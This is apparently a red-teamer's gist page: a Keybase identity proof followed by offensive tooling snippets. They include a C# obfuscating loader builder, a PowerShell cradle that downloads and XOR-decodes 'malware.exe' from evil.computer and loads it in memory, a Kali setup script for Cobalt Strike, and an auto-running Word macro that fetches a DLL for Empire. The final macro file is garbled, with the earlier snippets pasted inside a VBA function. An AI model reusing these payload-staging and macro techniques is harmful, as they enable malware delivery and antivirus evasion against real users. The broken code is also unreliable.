Vincent Van Mieghem vivami

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                vivami
                / keybase.md
            
            
              Created
              November 10, 2014 09:39
            
              
                keybase.md
              
          
    Keybase proof

I hereby claim:

I am vivami on github.
I am vanmieghem (https://keybase.io/vanmieghem) on keybase.
I have a public key whose fingerprint is D90D C025 6090 A35C BD62  C907 32F0 0526 6B85 75C8

To claim this, I am signing this object:

  
## encrypt.cs
String path = args[0];
key = getRandomKey();
String filename = Path.GetFileNameWithoutExtension(path).ToString();
String obfuscatedBin = obfuscateBinary(path);

private String obfuscateBinary(String file) {
    byte[] assemblyBytes = fileToByteArray(@file);
    byte[] encryptedAssembly = encrypt(assemblyBytes, key);
    return System.Convert.ToBase64String(encryptedAssembly);
}

## compile.cs
compile(srcFinal, filename + "_obfuscated.exe");

static void compile(String source, String outfile) {
    var provider_options = new Dictionary<string, string>
    {
        {"CompilerVersion","v3.5"}
    };
    var provider = new Microsoft.CSharp.CSharpCodeProvider(provider_options);

    var compiler_params = new System.CodeDom.Compiler.CompilerParameters();

## LoadAndInvoke.cs
public static string srcTemplate = @"using System;
                using System.Collections.Generic;
                using System.IO;
                using System.Reflection;
                using System.Security.Cryptography;

                namespace Loader {
                    public static class Loader {

                        private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };

## load-net.ps1
$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="XOR\_KEY";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://evil.computer/malware.exe")))|%{$_-bxor$k[$i++%$k.length]}
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
[namespace.Class]::Main($parameters)

## prep_kali.sh
# update kali
apt update && apt upgrade -y

#install java8 for cobalt strike
cd /opt
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee /etc/apt/sources.list.d/webupd8team-java.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys eea14886
apt-get -y update
echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | sudo /usr/bin/debconf-set-selections

## Empire_via_rundll-powershdll.vba
Sub AutoOpen()
    Debugging
End Sub

Sub Document_Open()
    Debugging
End Sub

Public Function Debugging() As Variant
    DownloadDLL
	String path = args[0];
	key = getRandomKey();
	String filename = Path.GetFileNameWithoutExtension(path).ToString();
	String obfuscatedBin = obfuscateBinary(path);

	private String obfuscateBinary(String file) {
	byte[] assemblyBytes = fileToByteArray(@file);
	byte[] encryptedAssembly = encrypt(assemblyBytes, key);
	return System.Convert.ToBase64String(encryptedAssembly);
	}
	compile(srcFinal, filename + "_obfuscated.exe");

	static void compile(String source, String outfile) {
	var provider_options = new Dictionary<string, string>
	{
	{"CompilerVersion","v3.5"}
	};
	var provider = new Microsoft.CSharp.CSharpCodeProvider(provider_options);

	var compiler_params = new System.CodeDom.Compiler.CompilerParameters();
	public static string srcTemplate = @"using System;
	using System.Collections.Generic;
	using System.IO;
	using System.Reflection;
	using System.Security.Cryptography;

	namespace Loader {
	public static class Loader {

	private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
	$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
	$k="XOR\_KEY";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://evil.computer/malware.exe")))\|%{$_-bxor$k[$i++%$k.length]}
	[System.Reflection.Assembly]::Load($b) \| Out-Null
	$parameters=@("arg1", "arg2")
	[namespace.Class]::Main($parameters)
	# update kali
	apt update && apt upgrade -y

	#install java8 for cobalt strike
	cd /opt
	echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" \| tee /etc/apt/sources.list.d/webupd8team-java.list
	echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" \| tee -a /etc/apt/sources.list.d/webupd8team-java.list
	apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys eea14886
	apt-get -y update
	echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true \| sudo /usr/bin/debconf-set-selections
	Sub AutoOpen()
	Debugging
	End Sub

	Sub Document_Open()
	Debugging
	End Sub

	Public Function Debugging() As Variant
	DownloadDLL